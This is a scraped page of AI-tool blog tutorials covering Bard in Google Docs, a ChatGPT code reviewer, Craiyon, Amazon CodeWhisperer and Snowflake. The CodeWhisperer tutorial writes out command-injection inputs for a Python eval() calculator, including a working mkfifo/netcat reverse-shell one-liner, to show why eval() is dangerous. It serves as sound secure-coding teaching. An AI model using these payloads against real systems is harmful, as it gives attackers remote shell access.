JSON.stringify(requestBody) }Now that we have everything ready, its time to define the parameters for the HTTP request that will be sent to the PaLM API endpoint. We start out by declaring the method parameter which is set to POST which indicates that the request will be sending data to the API.The headers parameter contains the header object that we declared a while back. Finally, the payload parameter is used to specify the data that will be sent in the request.These options are now passed as an argument to the UrlFetchApp.fetch function which sends the request to the PaLM API endpoint, and returns the response that contains the AI generated text.var response = UrlFetchApp.fetch(url,options); var data = JSON.parse(response.getContentText()); return data.candidates[0].output; }In this case, we just have to pass the url and options variable inside the UrlFetchApp.fetch function. Now that we have sent a request to the PaLM API endpoint we get a response back. In order to get an exact response we are going to be parsing the data.The getContentText() function is used to extract the text content from the response object. Since the response is in JSON format, we use the JSON.parse function to convert the JSON string into an object.The parsed data is then passed to the final variable output, inside which we get the first response out of multiple other drafts that Bard generates for us. On getting the first response we just return the output. function summarizeSelectedParagraph(){ var selection = DocumentApp.getActiveDocument().getSelection(); var text = selection.getRangeElements()[0].getElement().getText(); var summary = DocSummary(text); Now that we have the summary function ready and good to go, we will now go ahead and open the function that will be interacting with the Google Doc. We want the summary to be generated for the paragraph that the user selects. To do that we are going to get the selected text from the Google Doc using the getSelection() function. Once we get the selected text we go ahead and get the text using the .getText() function. To generate the summary using Google Bard we pass the text in the DocSummary() function. DocumentApp.getActiveDocument().getBody().appendParagraph("Summary"); DocumentApp.getActiveDocument().getBody().appendParagraph(summary) }Now that we have the summary for the selected text, it's time to append the paragraph back into the Google Doc. To do that we are going to be using the appendParagraph() function inside which we will pass the summary variable. Just to divide the summary from the original paragraph we append an additional line that says “Summary”. Our code is complete and good to go.Step 3: Check the outputIt's time to check the output and see if the code is working according to what we expected. To do that go ahead and save your code and run the OnOpen() function. This will create the menu that we can select and generate the summary for the paragraph.On running the code you should get an output like this in the Execution Log.On running the onOpen() function the custom menu has been created in the Google Doc successfully.To generate the summary in the Google Doc, follow the steps.1. Select the paragraph you want to generate the summary for.2. Once you select the paragraph go ahead and click on the custom menu and click on Summarise Selected paragraph.3. On clicking the option, you will see that the code will generate a summary for the paragraph we selected.Here you can see the summary for the paragraph has been generated in the Google Doc successfully.ConclusionIn this blog, we walked through the process of how we can access the PaLM API to integrate Google Bard inside of a Google Doc using Google Apps Script. The integration of Google Bard and Google Apps Script empowers users to generate summaries of paragraphs in Google Docs effortlessly.You can get the code from the GitHub link given below. Google-Apps-Script/BlogSummaryPaLM.js at master · aryanirani123/Google-Apps-ScriptCollection of Google Apps Script Automation scripts written and compiled by Aryan Irani. …github.comAuthor BioAryan Irani is a Google Developer Expert for Google Workspace. He is a writer and content creator who has been working in the Google Workspace domain for three years. He has extensive experience in the area, having published 100 technical articles on Google Apps Script, Google Workspace Tools, and Google APIs.Website
Read more
  • 0
  • 0
  • 8063

article-image-build-a-project-that-automates-your-code-review
Luis Sobrecueva
19 Jun 2023
15 min read
Save for later

Build a Project that Automates your Code Review

Luis Sobrecueva
19 Jun 2023
15 min read
Developers understand the importance of a solid code review process but find it time-consuming. Language Models (LLMs) offer a solution by providing insights into code flows and enforcing best practices. A project aims to automate code reviews using LLMs, revolutionizing developers' approach. An intelligent assistant will swiftly analyze code differences, generating feedback in seconds. Imagine having an AI-powered reviewer guiding you to write cleaner, more efficient code. The focus is to streamline the code review workflow, empowering developers to produce high-quality code while saving time. The system will offer comprehensive insights through automated analysis, highlighting areas that need attention and suggesting improvements. By embracing LLMs' potential and automation, this project aims to make code reviews seamless and rewarding. Join the journey to explore LLMs' impact on code review and enhance the development experience.Project OverviewIn this article, we are developing a Python program that will harness the power of OpenAI's ChatGPT for code review. This program will read diff changes from the standard input and generate comprehensive code review comments. The generated comments will be compiled into an HTML file, which will include AI-generated feedback for each diff file section, presented alongside the diff sections themselves as code blocks with syntax highlighting. To simplify the review process, the program will automatically open the HTML file in the user's default web browser.Image 1: Project PageBuild your ProjectLet's walk through the steps to build this code review program from scratch. By following these steps, you'll be able to create your own implementation tailored to your specific needs. Let's get started:1. Set Up Your Development Environment Ensure you have Python installed on your machine. You can download and install the latest version of Python from the official Python website.2. Install Required Libraries To interact with OpenAI's ChatGPT and handle diff changes, you'll need to install the necessary Python libraries. Use pip, the package installer for Python, to install the required dependencies. You can install packages by running the following command in your terminal:pip install openai numpy3. To implement the next steps, create a new Python file named `chatgpt_code_reviewer.py`.4. Import the necessary modules:import argparse import os import random import string import sys import webbrowser import openai from tqdm import tqdm5. Set up the OpenAI API key (you'll need to get a key at https://openai.com if you don't have one yet):openai.api_key = os.environ["OPENAI_KEY"]6. Define a function to format code snippets within the code review comments, ensuring they are easily distinguishable and readable within the generated HTML report.def add_code_tags(text):    # Find all the occurrences of text surrounded by backticks    import re    matches = re.finditer(r"`(.+?)`", text)    # Create a list to store the updated text chunks    updated_chunks = []    last_end = 0    for match in matches:     # Add the text before the current match     updated_chunks.append(text[last_end : match.start()])     # Add the matched text surrounded by <code> tags     updated_chunks.append("<b>`{}`</b>".format(match.group(1)))     # Update the last_end variable to the end of the current match     last_end = match.end()    # Add the remaining text after the last match    updated_chunks.append(text[last_end:])    # Join the updated chunks and return the resulting HTML string    return "".join(updated_chunks) 7. Define a function to generate a comment using ChatGPT:def generate_comment(diff, chatbot_context):    # Use the OpenAI ChatGPT to generate a comment on the file changes    chatbot_context.append(     {           "role": "user",           "content": f"Make a code review of the changes made in this diff: {diff}",     }    )    # Retry up to three times    retries = 3    for attempt in range(retries):     try:           response = openai.ChatCompletion.create(                 model="gpt-3.5-turbo",                 messages=chatbot_context,                 n=1,                 stop=None,                 temperature=0.3,           )     except Exception as e:           if attempt == retries - 1:                 print(f"attempt: {attempt}, retries: {retries}")                 raise e  # Raise the error if reached maximum retries           else:                 print("OpenAI error occurred. Retrying...")                 continue    comment = response.choices[0].message.content    # Update the chatbot context with the latest response    chatbot_context = [     {           "role": "user",                 "content": f"Make a code review of the changes made in this diff: {diff}",     },     {           "role": "assistant",           "content": comment,     }    ]    return comment, chatbot_context  The `generate_comment` function defined above uses the OpenAI ChatGPT to generate a code review comment based on the provided `diff` and the existing `chatbot_context`. It appends the user's request to review the changes in the `chatbot_context`. The function retries the API call up to three times to handle any potential errors. It makes use of the `openai.ChatCompletion.create()` method and provides the appropriate model, messages, and other parameters to generate a response. The generated comment is extracted from the response, and the chatbot context is updated to include the latest user request and assistant response. Finally, the function returns the comment and the updated chatbot context.This function will be a crucial part of the code review program, as it uses ChatGPT to generate insightful comments on the provided code diffs.8. Define a function to create the HTML output:def create_html_output(title, description, changes, prompt): random_string = "".join(random.choices(string.ascii_letters, k=5))    output_file_name = random_string + "-output.html"    title_text = f"\nTitle: {title}" if title else ""    description_text = f"\nDescription: {description}" if description else ""    chatbot_context = [     {           "role": "user",           "content": f"{prompt}{title_text}{description_text}",     }    ]    # Generate the HTML output    html_output = "<html>\n<head>\n<style>\n"    html_output += "body {\n    font-family: Roboto, Ubuntu, Cantarell, Helvetica Neue, sans-serif;\n    margin: 0;\n    padding: 0;\n}\n"    html_output += "pre {\n    white-space: pre-wrap;\n    background-color: #f6f8fa;\n    border-radius: 3px;\n  font-size: 85%;\n    line-height: 1.45;\n    overflow: auto;\n    padding: 16px;\n}\n"    html_output += "</style>\n"    html_output += '<link rel="stylesheet"\n href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.7.0/styles/default.min.css">\n <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.7.0/highlight.min.js"></script>\n'    html_output += "<script>hljs.highlightAll();</script>\n"    html_output += "</head>\n<body>\n"    html_output += "<div style='background-color: #333; color: #fff; padding: 20px;'>"    html_output += "<h1 style='margin: 0;'>AI code review</h1>"    html_output += f"<h3>Diff to review: {title}</h3>" if title else ""    html_output += "</div>"    # Generate comments for each diff with a progress bar    with tqdm(total=len(changes), desc="Making code review", unit="diff") as pbar:     for i, change in enumerate(changes):           diff = change["diff"]           comment, chatbot_context = generate_comment(diff, chatbot_context)           pbar.update(1)           # Write the diff and comment to the HTML           html_output += f"<h3>Diff</h3>\n<pre><code>{diff}</code></pre>\n"           html_output += f"<h3>Comment</h3>\n<pre>{add_code_tags(comment)}</pre>\n"    html_output += "</body>\n</html>"    # Write the HTML output to a file    with open(output_file_name, "w") as f:     f.write(html_output)    return output_file_name The `create_html_output` function defined above takes the `title`, `description`, `changes`, and `prompt` as inputs. It creates an HTML output file that contains the code review comments for each diff, along with the corresponding diff sections as code blocks with syntax highlighting. Let's explain it in more detail:First, the function initializes a random string to be used in the output file name. It creates the appropriate title and description text based on the provided inputs and sets up the initial `chatbot_context`. Next, the function generates the HTML structure and styling, including the necessary CSS and JavaScript libraries for syntax highlighting. It also includes a header section for the AI code review. Using a progress bar, the function iterates over each change in the changes list. For each change, it retrieves the `diff` and generates a comment using the `generate_comment` function. The progress bar is updated accordingly. The function then writes the `diff` and the corresponding comment to the HTML output. The `diff` is displayed within a `<pre><code>` block for better formatting, and the comment is wrapped in `<pre>` tags. The `add_code_tags` function is used to add code tags to the comment, highlighting any code snippets. After processing all the changes, the function completes the HTML structure by closing the `<body>` and `<html>` tags.Finally, the HTML output is written to a file with a randomly generated name. The file name is returned by the function as the output. This `create_html_output` function makes the final HTML output that presents the code review comments alongside the corresponding diff sections.9. Define a function to get diff changes from the pipeline:def get_diff_changes_from_pipeline():    # Get the piped input    piped_input = sys.stdin.read()    # Split the input into a list of diff sections    diffs = piped_input.split("diff --git")    # Create a list of dictionaries, where each dictionary contains a single diff section    diff_list = [{"diff": diff} for diff in diffs if diff]    return diff_list The `get_diff_changes_from_pipeline` function defined above retrieves the input from the pipeline, which is typically the output of a command like `git diff`. It reads the piped input using the`sys.stdin.read()`. The input is then split based on the "diff --git" string, which is commonly used to separate individual diff sections. This splits the input into a list of diff sections. By dividing the diff into separate sections, this function enables code reviews of very large projects. It overcomes the context limitation that LLMs have by processing each diff section independently. This approach allows for efficient and scalable code reviews, ensuring that the review process can handle projects of any size. The function returns the list of diff sections as the output, which can be further processed and utilized in the code review pipeline10. Define the main function:def main():    title, description, prompt = None, None, None    changes = get_diff_changes_from_pipeline()    # Parse command line arguments    parser = argparse.ArgumentParser(description="AI code review script")    parser.add_argument("--title", type=str, help="Title of the diff")    parser.add_argument("--description", type=str, help="Description of the diff")    parser.add_argument("--prompt", type=str, help="Custom prompt for the AI")    args = parser.parse_args()    title = args.title if args.title else title    description = args.description if args.description else description    prompt = args.prompt if args.prompt else PROMPT_TEMPLATE    output_file = create_html_output(title, description, changes, prompt)    try:     webbrowser.open(output_file)    except Exception:     print(f"Error running the web browser, you can try to open the outputfile: {output_file} manually") if __name__ == "__main__":    main() The `main` function serves as the entry point of the code review script. It begins by initializing the `title`, `description`, and `prompt` variables as `None`. Next, it calls the `get_diff_changes_from_pipeline` function to retrieve the diff changes from the pipeline. These changes will be used for the code review process. The script then parses the command line arguments using the `argparse` module. It allows specifying optional arguments such as `--title`, `--description`, and `--prompt` to customize the code review process. The values provided through the command line are assigned to the corresponding variables, overriding the default `None` values. After parsing the arguments, the `create_html_output` function is called to generate the HTML output file. The `title`, `description`, `changes`, and `prompt` is passed as arguments to the function. The output file name is returned and stored in the `output_file` variable. Finally, the script attempts to open the generated HTML file in the default web browser using the `webbrowser` module. If an error occurs during the process, a message is printed, suggesting manually opening the output file.11. Save the file and run it using the following command: git diff master..branch | python3 chatgpt_code_reviewer.pyA progress bar will be displayed and after a while, the browser will open an html file with the output of the command, depending on the number of files to review it may take a few seconds or a few minutes, in this video, you can see the process. Congratulations! You have now created your own ChatGPT code reviewer project from scratch. Remember to adapt and customize the prompt[1] based on your specific requirements and preferences. You can find the complete code on this ChatGPTCodeReviewer GitHub repository.Happy coding! Article Reference[1] The `prompt` is an essential component of the code review process using ChatGPT. It is typically a text that sets the context and provides instructions to the AI model about what is expected from its response like what it needs to review, specific questions, or guidelines to focus the AI's attention on particular aspects of the code.In the code, a default `PROMPT_TEMPLATE` is used if no custom prompt is provided. You can modify the `PROMPT_TEMPLATE` variable or pass your prompt using the `--prompt` argument to tailor the AI's behavior according to your specific requirements.By carefully crafting the prompt, you can help steer the AI's responses in a way that aligns with your code review expectations, ensuring the generated comments are relevant, constructive, and aligned with the desired code quality standards.Author Bio Luis Sobrecueva is a software engineer with many years of experience working with a wide range of different technologies in various operating systems, databases, and frameworks. He began his professional career developing software as a research fellow in the engineering projects area at the University of Oviedo. He continued in a private company developing low-level (C / C ++) database engines and visual development environments to later jump into the world of web development where he met Python and discovered his passion for Machine Learning, applying it to various large-scale projects, such as creating and deploying a recommender for a job board with several million users. It was also at that time when he began to contribute to open source deep learning projects and to participate in machine learning competitions and when he took several ML courses obtaining various certifications highlighting a MicroMasters Program in Statistics and Data Science at MIT and a Udacity Deep Learning nanodegree. He currently works as a Data Engineer at a ride-hailing company called Cabify, but continues to develop his career as an ML engineer by consulting and contributing to open-source projects such as OpenAI and Autokeras.Author of the book: Automated Machine Learning with AutoKeras 
Read more
  • 0
  • 0
  • 7679

article-image-creating-stunning-images-from-text-prompt-using-craiyon
Julian Melanson
21 Jun 2023
6 min read
Save for later

Creating Stunning Images from Text Prompt using Craiyon

Julian Melanson
21 Jun 2023
6 min read
In an era marked by rapid technological progress, Artificial Intelligence continues to permeate various fields, fostering innovation and transforming paradigms. One area that has notably experienced a surge of AI integration is the world of digital art. A range of AI-powered websites and services have emerged, enabling users to transform text descriptions into images, artwork, and drawings. Among these innovative platforms, Craiyon, formerly known as DALL-E mini, stands out as a compelling tool that transforms the artistic process through its unique text-to-image generation capabilities.Developed by Boris Dayma, Craiyon was born out of an aspiration to create a free, accessible AI tool that could convert textual descriptions into corresponding visuals. The concept of Craiyon was not conceived in isolation; rather, it emerged as a collaborative effort, with contributions from the expansive open-source community playing a significant role in the evolution of its capabilities.The AI behind Craiyon leverages the computing power of Google's PU Research Cloud (TRC). It undergoes rigorous training that imbues it with the ability to generate novel images based on user-provided textual inputs. In addition, Craiyon houses an expansive library of existing images that can further assist users in refining their queries.While the abilities of such an image generation model are undeniably impressive, certain limitations do exist. For instance, the model sometimes generates unexpected or stereotypical imagery, reflecting inherent biases in the datasets it was trained on. Notwithstanding these constraints, Craiyon's innovative technology holds substantial promise for the future of digital art.Image 1: Craiyon home page Getting Started with CraiyonIf you wish to test the waters with Craiyon's AI, the following steps can guide you through the process:Accessing Craiyon: First, navigate to the Craiyon website: https://www.craiyon.com. While you have the option to create a free account, you might want to familiarize yourself with the platform before doing so.Describing Your Image: Upon landing on the site, you will find a space where you can type a description of the image you wish to generate. To refine your request, consider specifying elements you want to be excluded from the image. Additionally, decide whether you want your image to resemble a piece of art, a drawing, or a photo.Initiating the Generation Process: Once you are satisfied with your description, click the "Draw" button. The generation process might take a moment, but it will eventually yield multiple images that match your description.Selecting and Improving Your Image: Choose an image that catches your eye. For a better viewing experience, you can upscale the resolution and quality of the image. If you wish to save the image, use the "Screenshot" button.Revising Your Prompt: If you are not satisfied with the generated images, consider revising your prompt. Craiyon might suggest alternative prompts to help you obtain improved results.Viewing and Saving Your Images: If you have created a free account, you can save the images you like by clicking the heart icon. You can subsequently access these saved images through the "My Collection" option under the "Account" button.Use CasesCreating art and illustrations: Craiyon can be used to create realistic and creative illustrations, paintings, and other artworks. This can be a great way for artists to explore new ideas and techniques, or to create digital artworks that would be difficult or time-consuming to create by hand.Generating marketing materials: Craiyon can be used to create eye-catching images and graphics for marketing campaigns. This could include social media posts, website banners, or product illustrations.Designing products: Craiyon can be used to generate designs for products, such as clothing, furniture, or toys. This can be a great way to get feedback on new product ideas, or to create prototypes of products before they are manufactured.Educating and communicating: Craiyon can be used to create educational and informative images. This could include diagrams, charts, or infographics. Craiyon can also be used to create images that communicate complex ideas in a more accessible way.Personalizing experiences: Craiyon can be used to personalize experiences, such as creating custom wallpapers, avatars, or greeting cards. This can be a great way to add a touch of individuality to your devices or communicationCraiyon is still under development, but it has the potential to be a powerful tool for a variety of uses. As the technology continues to improve, we can expect to see even more creative and innovative use cases for Craiyon in the future.Here are some additional use cases for Craiyon:Generating memes: Craiyon can be used to generate memes, which are humorous images that are often shared online. This can be a fun way to express yourself or to join in on a current meme trend.Creating custom content: Craiyon can be used to create custom content for your website, blog, or social media channels. This could include images, graphics, or even videos.Experimenting with creative ideas: Craiyon can be used to experiment with creative ideas. If you have an idea for an image or illustration, you can use Craiyon to see how it would look. This can be a great way to get feedback on your ideas or to explore new ways of thinking about art. SummaryThe emergence of AI tools like Craiyon marks a pivotal moment in the intersection of art and technology. While it's crucial to acknowledge the limitations of such tools, their potential to democratize artistic expression and generate creative inspiration is indeed remarkable. As Craiyon and similar platforms continue to evolve, we can look forward to a future where the barriers between language and visual expression are further blurred, opening up new avenues for creativity and innovation.Author BioJulian Melanson is one of the founders of Leap Year Learning. Leap Year Learning is a cutting-edge online school that specializes in teaching creative disciplines and integrating AI tools. We believe that creativity and AI are the keys to a successful future and our courses help equip students with the skills they need to succeed in a continuously evolving world. Our seasoned instructors bring real-world experience to the virtual classroom and our interactive lessons help students reinforce their learning with hands-on activities.No matter your background, from beginners to experts, hobbyists to professionals, Leap Year Learning is here to bring in the future of creativity, productivity, and learning!
Read more
  • 0
  • 0
  • 7569
article-image-writing-secure-code-with-amazon-codewhisperer
Joshua Arvin Lat
10 Nov 2023
12 min read
Save for later

Writing Secure Code with Amazon CodeWhisperer

Joshua Arvin Lat
10 Nov 2023
12 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights. Don't miss out – sign up today!IntroductionHave you ever used an AI coding assistant like Amazon CodeWhisperer? If not, you'll be surprised at how these AI-powered tools can significantly accelerate the coding process. In the past, developers had to rely solely on their expertise and experience to build applications. At the moment, we're seeing the next generation of developers leverage AI to not only speed up the coding process but also to ensure that their applications meet the highest standards of security and reliability.In this blog post, we will dive deep into how we can use CodeWhisperer to (1) speed up the coding process and (2) detect vulnerabilities and issues in our code. We’ll have the following sections in this post: Part 01 — Technical RequirementsPart 02 — Avoiding conflicts or issues with existing installed extensionsPart 03 — Using Amazon CodeWhisperer to accelerate Python coding workPart 04 — Realizing and proving that our code is vulnerablePart 05 — Detecting security vulnerabilities with Amazon CodeWhispererWithout further ado, let’s begin!Part 01 — Technical RequirementsYou need to have Amazon CodeWhisperer installed and configured with VS Code on our local machine. Note that we will be using CodeWhisperer Professional for a single user.  Make sure to check the pricing page (https://aws.amazon.com/codewhisperer/pricing/) especially if this is your first time using CodeWhisperer. Before installing and setting up the CodeWhisperer extension in VS Code, you need to:(1) Enable IAM Identity Center and create an AWS organization(2) Create an IAM organization user(3) Set up CodeWhisperer for a single user, and(4) Set up the AWS Toolkit for VS Code (https://aws.amazon.com/visualstudiocode/).Make sure that the CodeWhisperer extension is installed and set up completely before proceeding. We’ll skip the steps for setting up and configuring VS Code so that we can focus more on how to use the different features and capabilities of Amazon CodeWhisperer.Note: Feel free to check the following link for more information on how to set up CodeWhisperer: https://docs.aws.amazon.com/codewhisperer/latest/userguide/whisper-setup-prof-devs.html.Part 02 — Avoiding conflicts or issues with existing installed extensionsTo ensure that other installed extensions won’t conflict with the AWS Toolkit, we have the option to disable all installed extensions similar to what is shown in the following image:                                                                          Image 01 — Disabling All Installed ExtensionsOnce all installed extensions have been disabled, we need to make sure that the AWS Toolkit is enabled by locating the said extension under the list of installed extensions and then clicking the Enable button (as highlighted in the following image):                                                                      Image 02 — Enabling the AWS Toolkit extensionThe AWS Toolkit may require you to connect and authenticate again. For more information on how to manage extensions in VS Code, feel free to check the following link: https://code.visualstudio.com/docs/editor/extension-marketplacePart 03 — Using Amazon CodeWhisperer to accelerate Python coding workSTEP # 01:  Let’s start by creating a new file in VS Code. Name it whisper.py (or any other filename)                                                                                                              Image 03 — Creating a new file STEP # 02: Type the following single-line comment in the first line # Create a calculator function that accepts a string expression using input() and uses eval() to evaluate the expressionSTEP # 03: Next, press the ENTER keyYou should see a recommended line of code after a few seconds. In case the recommendation disappears (or does not appear at all), feel free to press OPTION + C (if you’re on Mac) or ALT + C (if you’re on Windows or Linux)  to trigger the recommendation:                                                             Image 04 — CodeWhisperer suggesting a single line of codeSTEP # 04: Press TAB to accept the code suggestion                                                                                       Image 05 — Accepting the code suggestion by pressing TABSTEP # 05: Press ENTER to go to the next line. You should see a code recommendation after a few seconds. In case the recommendation disappears (or does not appear at all), feel free to press OPTION + C (if you’re on Mac) or ALT + C (if you’re on Windows or Linux)  to trigger the recommendation:                                                                   Image 06 — CodeWhisperer suggesting a block of codeSTEP # 06: Press TAB to accept the code suggestionImage 07 — Accepting the code suggestion by pressing TABSTEP # 07: Press ENTER twice and then backspace.STEP # 08: Type if and you should see a recommendation similar to what we have in the following image:.Image 08 — CodeWhisperer suggesting a line of codeSTEP # 09: Press ESC to ignore the recommendation.STEP # 10: Press OPTION + C (if you’re on Mac) or ALT + C (if you’re on Windows or Linux)  to trigger another recommendationImage 09 — CodeWhisperer suggesting a block of codeSTEP # 11: Press TAB to accept the code suggestionImage 10 — Accepting the code suggestion by pressing TABNote that you might get a different set of recommendations when using CodeWhisperer. In cases where there are multiple recommendations, you can use the left (←) and right (→) arrow keys to select from the list of available recommendations.In case you are planning to try the hands-on examples yourself, here is a copy of the code generated in the previous set of steps:# Create a calculator function that accepts a string expression using input() and uses eval() to evaluate the expression def calculator():    expression = input("Enter an expression: ")    result = eval(expression)    print(result)    return result if __name__ = "__main__":    calculator()    # ...STEP # 12: Open a New Terminal (inside VS Code):Image 11 — Opening a new Terminal inside VS CodeSTEP # 13: Assuming that we are able to run Python scripts locally (that is, with our local machine properly configured), we should be able to run our script by running the following (or a similar command depending on how your local machine is set up):python3 whisper.pyImage 12 — Running the code locallyIf you entered the expression 1 + 1 and got a result of 2, then our application is working just fine!Part 04 — Realizing and proving that our code is vulnerableIn order to write secure code, it’s essential that we have a good idea of how our code could be attacked and exploited. Note that we are running the examples in this section on a Mac. In case you’re unable to run some of the commands in your local machine, that should be alright as we are just demonstrating in this section why the seemingly harmless eval() function should be avoided whenever possible.STEP # 01:  Let’s run the whisper.py script again and specify print('hello') when asked to input an expression.print('hello')This should print hello similar to what we have in the following image:Image 13 — Demonstrating why using eval() is dangerousLooks like we can take advantage of this vulnerability and run any valid Python statement! Once a similar set of lines is used in a backend Web API implementation, an attacker might be able to inject commands as part of the request which could be processed by the eval() statement. This in turn could allow attackers to inject commands that would connect the target system and the attacker machine with something like a reverse shell.STEP # 02: Let’s run whisper.py again and specify the following statement when asked to input an expression:__import__('os').system('echo hello')#This should run the bash command and print hello similar to what we have in the following image:Image 14 — Another example to demonstrate why using eval() is dangerousSTEP # 03: Let’s take things a step further! Let’s open the Terminal app and let’s use netcat to listen on port 14344 by running the following command:nc -nvl 14344Image 15 — Using netcat to listen on port 14344Note that we are running the command inside the Terminal app (not the terminal window inside VS Code).STEP # 04: Navigate back to the VS Code window and run whisper.py again. This time, let’s enter the following malicious input when asked to enter an expression:__import__('os').system('mkfifo /tmp/ABC; cat /tmp/ABC | /bin/sh -i 2>&1 | nc localhost 14344 > /tmp/ABC')#This would cause the application to wait until the reverse shell is closed on the other side (that is, from the terminal window we opened in the previous step)Image 16 — Entering a malicious input to start a reverse shellNote that in order to get this to work, /tmp/ABC must not exist yet before the command runs. Feel free to delete /tmp/ABC in case you need to retry this experiment.STEP # 05: Back in our separate terminal window, we should be able to access a shell similar to what we have in the following image:Image 17 — Reverse shellFrom here, an attacker could potentially run commands that would help them steal the data stored in the compromised machine or use the compromised machine to attack other resources. Since this is just a demonstration, simply run exit to close the shell. It is important to note that in our simplified example, we used the same system for the attacker and victim machines.Image 18 — How attackers could connect the target machine to the attacker machineOf course, in real-life scenarios and penetration testing activities, the attacker machine would be a separate/external machine. This means that the malicious input needs to be modified with the external attacker's IP address (and not localhost).Important Note: It is unethical and illegal to attack resources owned by another user or company. These concepts and techniques were shared to help you understand the risks involved when using vulnerable functions such as eval().Part 05 — Detecting security vulnerabilities with Amazon CodeWhispererDo you think most developers would even know that the exploit we performed in the previous section is even possible? Probably not! One of the ways to help developers write more secure code (that is, without having to learn how to attack and exploit their own code) is by having a tool that automatically detects vulnerabilities in the code being written. The good news is that CodeWhisperer gives us the ability to run security scans with a single push of a button! We’ll show you how to do this in the next set of steps:STEP # 01: Click the AWS icon highlighted in the following image:Image 19 — Running a security scan using Amazon CodeWhispererYou should find CodeWhisperer under Developer Tools similar to what we have in Image X. Under CodeWhisperer, you should find several options such as Pause Auto-Suggestions, Run Security Scan, Select Customization, Open Code Reference Log, and Learn.STEP # 02: Click the Run Security Scan option. This will run a security scan that will flag several vulnerabilities and issues similar to what we have in the following image:Image 20 — Results of the security scanThe security scan may take about a minute to complete. It is important for you to be aware that while this type of security scan will not detect all the vulnerabilities and issues in your code, adding this step during the coding process would definitely prevent a lot of security issues and vulnerabilities.Note that we won’t discuss in this post how to fix the current code. In case you’re wondering what the next steps are, all you need to do is perform the needed modifications and then run the security scan again. Of course, there would be a bit of trial and error involved as resolving the vulnerabilities may not be as straightforward as it looks.ConclusionIn this post, we were able to showcase the different features and capabilities of Amazon CodeWhisperer. If you are interested to learn more about how various AI tools can accelerate the coding process, feel free to check Chapter 9 of my 3rd book “Building and Automating Penetration Testing Labs in the Cloud”. You’ll learn how to use AI solutions such as ChatGPT, GitHub Copilot, GitHub Copilot Labs, Amazon CodeWhisperer, and Tabnine Pro to significantly accelerate the coding process.Author BioJoshua Arvin Lat is the Chief Technology Officer (CTO) of NuWorks Interactive Labs, Inc. He previously served as the CTO of 3 Australian-owned companies and also served as the Director for Software Development and Engineering for multiple e-commerce startups in the past. Years ago, he and his team won 1st place in a global cybersecurity competition with their published research paper. He is also an AWS Machine Learning Hero and he has been sharing his knowledge in several international conferences to discuss practical strategies on machine learning, engineering, security, and management. He is also the author of the books "Machine Learning with Amazon SageMaker Cookbook", "Machine Learning Engineering on AWS", and "Building and Automating Penetration Testing Labs in the Cloud". Due to his proven track record in leading digital transformation within organizations, he has been recognized as one of the prestigious Orange Boomerang: Digital Leader of the Year 2023 award winners.
Read more
  • 0
  • 0
  • 7428

article-image-ai-powered-data-visualization-with-snowflake
Shankar Narayanan
19 Oct 2023
8 min read
Save for later

AI-Powered Data Visualization with Snowflake

Shankar Narayanan
19 Oct 2023
8 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights. Don't miss out – sign up today!IntroductionLarge language models, also known as LLM and generative Artificial Intelligence (AI), are revolutionizing various enterprises and businesses' productivity. One can expect the benefits of automation of the fast generation of insights and repetitive tasks from a large data pool.Pursuing insights has developed cutting-edge data storage solutions, including the Snowflake data cloud. This has the capabilities of artificial intelligence in visualizing data.Let us explore the synergy between Snowflake and AI, which facilitates data exploration while empowering businesses to acquire profound insights.Snowflake Data Cloud: the foundation for modern data warehousingEven before we start with our exploration, it is imperative to understand how Snowflake plays a significant role in modern data warehousing. It is a cloud-based data warehousing platform known for performance, ease of use, and scalability. As it provides a flexible and secure environment for analyzing and storing data, it is an ideal choice for every enterprise that deals with diverse and large data sets.Key featuresSome of the critical elements of the snowflake data cloud are mentioned below.●  Separates computing and storage.Snowflake's unique architecture helps scale the organization's computing resources independently from the storage. It helps to result in performance optimization and cost efficiency.●  Data SharingWith the help of seamless data sharing, Snowflake helps enterprises to share data between organizations that can foster data monetization opportunities and collaboration.●  Multi-cloud supportOne must know that Snowflake is compatible with most of the cloud providers. Therefore, it allows businesses to leverage their preferred cloud infrastructure.Unleash the potential of AI-Powered Data VisualizationWhen you have understood the concept of Snowflake, it is time that you get introduced to a game changer: AI-powered data visualization. The AI algorithm has undoubtedly evolved. They help to assist in the analyses and exploration of complex data sets while revealing insights and patterns that can be challenging to discover through traditional methods.Role of AI in data visualisationAI in data visualization plays a significant role. Some of these are:●  Predictive analyticsThe machine learning models help forecast anomalies and trends, thus enabling businesses and enterprises to make proactive decisions.●  Automated InsightsArtificial intelligence can analyze data sets quickly. It helps reduce the time required for manual analyses and extracts meaningful insights.●  Natural Language ProcessingNatural Language Processing or NLP algorithms can help to turn the textual data into visual representation. This process makes the unstructured data readily accessible.Harness the power of AI and SnowflakeLet us explore how one can collaborate with snowflakes and artificial intelligence to empower their business in gaining deeper insights.●  Data integrationThe ease of integration presented by Snowflake allows the organization to centralize the data. It does not matter whether the businesses consolidate their data from IOT devices, external partners, or internal sources. The unified data repository eventually becomes the foundation for AI-powered exploration.Example:Creating a Snowflake database and warehouse-- -- Create a new Snowflake database CREATE DATABASE my_database; -- Create a virtual warehouse for query processing CREATE WAREHOUSE my_warehouse  WITH WAREHOUSE_SIZE = 'X-SMALL'  AUTO_SUSPEND = 600  AUTO_RESUME = TRUE; 2. Loading data into Snowflake-- Create an external stage for data loading CREATE OR REPLACE STAGE my_stage URL = 's3://my-bucket/data/' CREDENTIALS = (AWS_KEY_ID = 'your_key_id' AWS_SECRET_KEY = 'your_secret_key'); -- Copy data from the stage into a Snowflake table COPY INTO my_table FROM @my_stage FILE_FORMAT = (TYPE = CSV) ON_ERROR = 'CONTINUE';● AI-driven code generationOne of the exciting aspects of collaborating AI and Snowflake happens to be the ability of artificial intelligence to generate code for data visualization. Here is how the process works.● Data preprocessingAI algorithms can prepare data for visualization while reducing the burden of the data engineers. At the same time, it has the capability of cleaning and transforming the data for visualization● Visualization suggestions Artificial intelligence helps to analyze data while suggesting appropriate visualization types, including scatter plots, charts, bars, and more. It analyses based on the characteristics presented by the data set● Automated code generationAfter choosing the visualization type, artificial intelligence helps generate the code needed to create interactive visualization. Hence, the process becomes accessible to every non-technical user.Let us know this with the help of the below example.from sklearn.cluster import KMeans from yellowbrick.cluster import KElbowVisualizer # Using AI to determine the optimal number of clusters (K) in K-means model = KMeans() visualizer = KElbowVisualizer(model, k=(2, 10)) visualizer.fit(scaled_data) visualizer.show() ● 